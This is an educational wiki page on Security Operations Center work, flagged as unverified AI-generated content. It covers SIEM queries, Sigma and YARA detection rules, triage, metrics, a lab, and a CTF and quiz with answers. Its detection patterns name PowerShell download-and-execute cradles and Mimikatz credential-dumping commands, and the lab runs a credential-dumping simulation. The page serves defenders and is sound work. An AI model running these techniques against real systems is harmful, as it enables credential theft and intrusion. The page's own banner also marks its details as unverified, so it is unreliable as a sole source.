Skip to content
Unverified — AI-generated content. Help verify this page

Blue Team & SOC Operations

The Security Operations Center (SOC) is the nerve center of an organization's defensive security capability. SOC analysts monitor, detect, investigate, and respond to security incidents around the clock. Blue team engineering goes further — building the detections, tuning the alerts, and designing the infrastructure that makes the SOC effective.

This page covers the operational structure of a SOC, the tools used for detection and investigation, how to build effective detection rules, and the metrics that measure SOC performance. If you want to understand what happens after an alert fires, this is where you start.

Related: Cybersecurity Overview | Red Team Operations | Active Directory | Malware Analysis


SOC Organizational Structure

SOC Tiers

Modern SOCs use a tiered model where analysts at different levels handle incidents of increasing complexity.

Roles and Responsibilities

TierTitleResponsibilitiesSkills RequiredAvg Salary (US)
L1SOC AnalystMonitor dashboards, triage alerts, execute playbooks, escalateSIEM basics, networking, OS fundamentals$55K-$75K
L2Incident ResponderInvestigate escalated incidents, perform containment, correlate eventsLog analysis, malware triage, forensics$75K-$110K
L3Threat Hunter / Detection EngineerProactive hunting, build detection rules, tune SIEM, tool developmentAdvanced forensics, scripting, ATT&CK expertise$110K-$160K
SOC ManagerTeam leadership, metrics reporting, process improvement, vendor managementLeadership, communication, security strategy$130K-$180K

SIEM Platforms

Security Information and Event Management (SIEM) platforms aggregate logs from every source in the environment, correlate events, and trigger alerts.

SIEM Comparison

FeatureSplunk EnterpriseElastic SIEMMicrosoft SentinelQRadar
DeploymentOn-prem / CloudOn-prem / CloudCloud-only (Azure)On-prem / Cloud
Query LanguageSPLKQL / LuceneKQLAQL
Pricing ModelData volume (GB/day)Nodes / self-managedData ingestion (GB/day)EPS (events/sec)
StrengthsMature ecosystem, SPL powerOpen source core, cost-effectiveAzure integration, AI/MLIBM ecosystem, compliance
WeaknessesExpensive at scaleComplex cluster managementAzure lock-inDeclining market share
Best ForLarge enterprise, complex analysisCost-conscious, technical teamsMicrosoft-heavy environmentsRegulated industries

Splunk SPL Essentials

spl
# Basic search — find failed logins in the last 24 hours
index=windows sourcetype=WinEventLog EventCode=4625
| stats count by src_ip, user
| sort -count
| where count > 10

# Detect Kerberoasting — TGS requests with RC4 encryption
index=windows sourcetype=WinEventLog EventCode=4769 Ticket_Encryption_Type=0x17
| where ServiceName != "$*"
| stats count by ServiceName, Client_Address
| where count > 5

# Detect lateral movement — PsExec-style service creation
index=windows sourcetype=WinEventLog EventCode=7045
| where Service_Name != "Windows Update" AND Service_Name != "BITS"
| table _time, ComputerName, Service_Name, Service_File_Name

# PowerShell suspicious commands
index=windows sourcetype=WinEventLog EventCode=4104
| search ScriptBlockText="*Invoke-Mimikatz*" OR ScriptBlockText="*Invoke-Kerberoast*"
| table _time, ComputerName, ScriptBlockText

# Network connection anomalies
index=firewall action=allowed dest_port=443
| stats count dc(dest_ip) as unique_destinations by src_ip
| where unique_destinations > 100

Elastic SIEM / KQL

# KQL — Detect suspicious PowerShell execution
event.code: "4104" and powershell.file.script_block_text: (*downloadstring* or *invoke-expression* or *iex* or *bypass*)

# KQL — Failed authentication from multiple sources
event.code: "4625" | stats count by source.ip, user.name | where count > 10

# KQL — Process execution from unusual paths
process.executable: (*\\Temp\\* or *\\AppData\\* or *\\Downloads\\*) and not process.name: (chrome.exe or firefox.exe or msedge.exe)

Microsoft Sentinel (KQL)

kql
// Detect brute force attacks
SecurityEvent
| where EventID == 4625
| summarize FailedAttempts = count() by TargetAccount, IpAddress, bin(TimeGenerated, 1h)
| where FailedAttempts > 20
| project TimeGenerated, TargetAccount, IpAddress, FailedAttempts

// Detect anomalous sign-ins (Azure AD)
SigninLogs
| where ResultType != "0"
| summarize FailureCount = count() by UserPrincipalName, IPAddress, Location
| where FailureCount > 10

// Detect DCSync indicators
SecurityEvent
| where EventID == 4662
| where Properties has "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
| where SubjectUserName !endswith "$"
| project TimeGenerated, SubjectUserName, ObjectName

Detection Engineering

Detection engineering is the practice of building, testing, and maintaining detection rules that identify malicious activity with high precision and low false positive rates.

Detection Lifecycle

Sigma Rules

Sigma is a vendor-agnostic format for detection rules. Write once, convert to any SIEM platform.

yaml
# Sigma rule — Detect suspicious PowerShell execution
title: Suspicious PowerShell Download Cradle
id: 3b6ab547-8ec2-4991-b5b6-1e5d7fd6f5f3
status: production
description: Detects PowerShell commands commonly used to download and execute payloads
author: SOC Team
date: 2026/03/20
references:
    - https://attack.mitre.org/techniques/T1059/001/
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Script Block Logging must be enabled'
detection:
    selection_download:
        ScriptBlockText|contains:
            - 'DownloadString'
            - 'DownloadFile'
            - 'Invoke-WebRequest'
            - 'wget '
            - 'curl '
            - 'Start-BitsTransfer'
    selection_exec:
        ScriptBlockText|contains:
            - 'Invoke-Expression'
            - 'IEX('
            - 'IEX ('
            - 'iex('
    condition: selection_download and selection_exec
falsepositives:
    - Legitimate admin scripts that download and execute
    - Software deployment tools
level: high
bash
# Convert Sigma rules to SIEM-specific formats
# Install sigmac (Sigma converter)
pip install sigma-cli

# Convert to Splunk SPL
sigma convert -t splunk -p sysmon suspicious_powershell.yml

# Convert to Elastic KQL
sigma convert -t elasticsearch suspicious_powershell.yml

# Convert to Microsoft Sentinel KQL
sigma convert -t microsoft365defender suspicious_powershell.yml

# Bulk convert entire ruleset
sigma convert -t splunk -p sysmon rules/ --output splunk_rules/

YARA Rules

YARA identifies and classifies malware based on textual or binary patterns. Used for file scanning, memory scanning, and threat hunting.

yara
rule Mimikatz_Detection {
    meta:
        description = "Detects Mimikatz credential dumping tool"
        author = "SOC Team"
        severity = "critical"
        reference = "https://attack.mitre.org/software/S0002/"

    strings:
        $s1 = "sekurlsa::logonpasswords" ascii wide
        $s2 = "sekurlsa::wdigest" ascii wide
        $s3 = "lsadump::dcsync" ascii wide
        $s4 = "kerberos::golden" ascii wide
        $s5 = "mimikatz" ascii wide nocase
        $s6 = "gentilkiwi" ascii wide

        // Byte patterns for packed/obfuscated variants
        $b1 = { 4D 69 6D 69 6B 61 74 7A }
        $b2 = { 6D 69 6D 69 6B 61 74 7A }

    condition:
        uint16(0) == 0x5A4D and  // PE file
        (any of ($s*)) or
        (2 of ($b*))
}

rule Cobalt_Strike_Beacon {
    meta:
        description = "Detects Cobalt Strike beacon payloads"
        author = "SOC Team"
        severity = "critical"

    strings:
        $config = { 00 01 00 01 00 02 ?? ?? 00 02 00 01 00 02 ?? ?? }
        $sleep_mask = "SleepMask" ascii
        $pipe = "\\\\.\\pipe\\msagent_" ascii

    condition:
        uint16(0) == 0x5A4D and
        ($config or $sleep_mask or $pipe)
}

Threat Intelligence

Threat Intelligence Lifecycle

Intelligence Types

TypeDescriptionExampleConsumer
StrategicHigh-level trends, motivations, geopolitics"APT28 is targeting NATO defense contractors"Leadership, CISO
TacticalTTPs used by adversaries, mapped to ATT&CK"Threat actors use DLL sideloading via OneDrive"Detection engineers
OperationalSpecific campaigns, timelines, infrastructure"Campaign X uses domain evil.com, IP 1.2.3.4"Incident responders
TechnicalIOCs: hashes, IPs, domains, URLsmalware.exe SHA256: abc123...SIEM, EDR, firewalls

Threat Intel Platforms & Feeds

PlatformTypeCostStrengths
MISPOpen source TIPFreeCommunity sharing, STIX/TAXII
OpenCTIOpen source TIPFreeKnowledge graph, ATT&CK mapping
AlienVault OTXCommunity feedFreeLarge community, pulse system
VirusTotalFile/URL analysisFree tier + EnterpriseMulti-AV scanning, behavior
Recorded FutureCommercial TIP$$$$AI-powered, comprehensive
CrowdStrike Falcon IntelCommercial feed$$$Actor profiles, real-time alerts
Abuse.chCommunity feedsFreeURLhaus, MalwareBazaar, ThreatFox

Alert Triage Workflow

A structured triage workflow prevents alert fatigue and ensures consistent investigation quality.

Triage Checklist

markdown
## Alert Triage Template

### 1. Initial Assessment (< 5 minutes)
- [ ] Read alert title and description
- [ ] Check if source IP/user is known (VIP, service account, scanner)
- [ ] Check alert history — has this fired before? How was it resolved?
- [ ] Check threat intel — are IOCs in any feeds?

### 2. Context Gathering (< 15 minutes)
- [ ] Pivot on source IP: What other activity from this IP in the last 24h?
- [ ] Pivot on user: Is this normal behavior for this user/role?
- [ ] Pivot on destination: Is this a legitimate service/server?
- [ ] Check EDR: Any endpoint alerts on the same host?
- [ ] Check network: Any unusual traffic patterns?

### 3. Decision
- [ ] False Positive → Document, tune rule, close
- [ ] True Positive, benign → Document, close (consider policy)
- [ ] True Positive, malicious → Escalate, begin IR

Reducing Alert Fatigue

The average SOC receives 10,000+ alerts per day. Most are false positives. To combat fatigue:

  1. Tune rules aggressively — Every FP that repeats should be filtered
  2. Use risk scoring — Aggregate low-fidelity signals into high-confidence alerts
  3. Automate triage — SOAR playbooks handle repetitive investigation steps
  4. Enrich automatically — Auto-lookup IPs, hashes, domains against threat intel
  5. Track FP rates per rule — Rules above 90% FP rate need rewriting or removal

SOC KPIs and Metrics

Key Performance Indicators

MetricDefinitionTargetHow to Improve
MTTD (Mean Time to Detect)Time from attack to first alert< 24 hoursBetter detection rules, more log sources
MTTR (Mean Time to Respond)Time from alert to containment< 4 hoursSOAR automation, clear playbooks
MTTA (Mean Time to Acknowledge)Time from alert to analyst assignment< 15 minutesProper staffing, alert routing
False Positive Rate% of alerts that are benign< 40%Tune rules, add context, risk scoring
Detection Coverage% of ATT&CK techniques with detections> 70%Gap analysis, new data sources
Alert VolumeAlerts per analyst per shift< 50 actionableTune, deduplicate, automate
Dwell TimeTime attacker is undetected in network< 7 daysThreat hunting, better visibility

Log Sources and Visibility

A SOC is only as good as its data sources. Missing logs means missing attacks.

Log SourceWhat It ShowsCritical Events
Windows Security LogAuthentication, process creation, object access4624, 4625, 4688, 4662, 4769
SysmonEnhanced process, network, file monitoringEvent 1 (process), 3 (network), 11 (file create)
EDR TelemetryEndpoint behavior, process trees, file writesVaries by vendor
Firewall LogsNetwork connections allowed/deniedOutbound to suspicious IPs/ports
DNS LogsDomain resolution queriesQueries to known-bad domains, DGA patterns
Proxy/Web GatewayHTTP/S traffic, URLs visitedDownloads of executables, C2 traffic
Email GatewayInbound/outbound email, attachmentsPhishing attempts, malicious attachments
Cloud Audit LogsAPI calls, IAM changes, resource creationPrivilege escalation, data access
Authentication LogsSSO, MFA, VPN loginsImpossible travel, credential stuffing

Critical: Enable These Logs

Many organizations lack visibility because key logs are not enabled:

  • PowerShell Script Block Logging (Event 4104) — Reveals obfuscated PowerShell
  • Sysmon — Provides process, network, and file visibility far beyond default Windows logging
  • Windows command-line audit (Event 4688 with process command line) — Shows what processes are doing
  • DNS query logging — Essential for detecting C2, tunneling, and DGA domains

SOAR (Security Orchestration, Automation, and Response)

SOAR platforms automate repetitive SOC tasks through playbooks.

PlatformTypeStrengths
Splunk SOAR (Phantom)CommercialDeep Splunk integration
Microsoft Sentinel + Logic AppsCloudAzure ecosystem
Cortex XSOAR (Palo Alto)CommercialLarge integration library
ShuffleOpen sourceFree, community-driven
TheHiveOpen sourceCase management + Cortex analyzers

Example SOAR Playbook: Phishing Triage


Further Reading


Key Takeaway

  • A SOC is only as good as its data sources — missing logs means missing attacks; enable Sysmon, PowerShell Script Block Logging, and DNS query logging before anything else
  • Sigma rules provide vendor-agnostic detection: write once, convert to Splunk SPL, Elastic KQL, or Sentinel KQL with a single command
  • The biggest enemy of a SOC is alert fatigue — tune aggressively, automate triage with SOAR, and track false positive rates per rule
Hands-On Lab

Lab: Build a Detection Engineering Pipeline

  1. Set up a free Elastic SIEM instance (or Wazuh) on a lab VM
  2. Configure Windows Event forwarding from a test workstation with Sysmon installed
  3. Write a Sigma rule to detect Mimikatz execution (look for process name or command-line patterns)
  4. Convert the Sigma rule to your SIEM's query language using sigma convert
  5. Deploy the detection rule in your SIEM
  6. Execute a Mimikatz simulation using Atomic Red Team (Invoke-AtomicTest T1003.001)
  7. Verify the alert fires, then tune it to reduce false positives from legitimate LSASS access
  8. Create a SOAR playbook that automatically enriches alerts with VirusTotal lookups
CTF Challenge

Challenge: The Phantom Lateral Movement

Your SIEM shows a successful logon (Event ID 4624, Logon Type 3) from workstation WS-042 to server SRV-DB-01 at 2:17 AM using the svc_sql account. No legitimate admin activity was scheduled. Investigate the alert and determine: Is this a true positive? What attack technique was used? What should be contained?

Hints:

  1. Check Event ID 4769 on the DC around 2:15 AM for TGS requests
  2. Look for Event ID 7045 on SRV-DB-01 for new service creation
  3. Check if svc_sql is a Kerberoastable service account
Answer

Event ID 4769 at 2:15 AM shows a TGS request for svc_sql with RC4 encryption (type 0x17) from WS-042 — Kerberoasting. The attacker cracked the service ticket offline and used the password for lateral movement. Event ID 7045 on SRV-DB-01 shows a new service BTOBTO created by svc_sql — PsExec-style execution. Contain: isolate WS-042 and SRV-DB-01, reset svc_sql password, convert to gMSA. Flag: CTF{kerberoast_lateral_move_detected}.

:::

Common Misconceptions

  • "More alerts mean better security" — Alert volume without context creates fatigue. Quality (high true positive rate) matters more than quantity.
  • "SIEM deployment means threats are detected" — A SIEM without tuned rules, sufficient log sources, and trained analysts is just an expensive log storage solution.
  • "Threat hunting is just running queries" — True threat hunting starts with a hypothesis based on threat intelligence, systematically searches for evidence, and creates new detections from findings.
  • "Sigma rules replace SIEM-specific rules" — Sigma provides portability, but converted rules often need platform-specific tuning for field names, log formats, and performance optimization.
  • "L1 analysts just click buttons" — Effective L1 triage requires understanding networking, OS internals, and attacker TTPs. The role is the foundation of SOC effectiveness.
Quiz

1. What is the primary advantage of Sigma detection rules?

a) They are faster than native SIEM rules b) They are vendor-agnostic and can be converted to any SIEM platform c) They automatically block threats d) They replace YARA rules

Answer

b) Sigma rules are written in a universal YAML format and can be converted to Splunk SPL, Elastic KQL, Microsoft Sentinel KQL, and other SIEM query languages.

2. What SOC metric measures the time from an attack starting to the first alert firing?

a) MTTR (Mean Time to Respond) b) MTTD (Mean Time to Detect) c) MTTA (Mean Time to Acknowledge) d) SLA compliance rate

Answer

b) MTTD measures the elapsed time between when an attack begins and when the SOC's first alert fires. Lower MTTD means faster detection.

3. Which Windows Event ID reveals the full text of PowerShell scripts executed on a system?

a) 4624 b) 4688 c) 4104 d) 7045

Answer

c) Event ID 4104 (PowerShell Script Block Logging) captures the full text of every PowerShell script executed, including deobfuscated content. This is critical for detecting encoded or obfuscated PowerShell attacks.

4. What is the purpose of SOAR in a SOC?

a) Replacing analysts entirely b) Automating repetitive triage and response tasks through playbooks c) Storing log data more efficiently d) Training new analysts

Answer

b) SOAR (Security Orchestration, Automation, and Response) automates repetitive investigation steps like IOC enrichment, email quarantine, and IP blocking, freeing analysts for complex analysis.

5. What should a SOC do when a detection rule has a 95% false positive rate?

a) Ignore all alerts from that rule b) Disable the rule entirely c) Rewrite or tune the rule to improve precision, or remove it d) Increase the alert priority

Answer

c) A rule with 95% FP rate wastes analyst time and contributes to alert fatigue. It should be rewritten with more specific conditions, additional context filters, or removed if it cannot be improved.

:::

One-Liner Summary: The blue team's job is not to prevent every attack — it is to detect, contain, and recover faster than the attacker can cause damage.

"What I cannot create, I do not understand." — Richard Feynman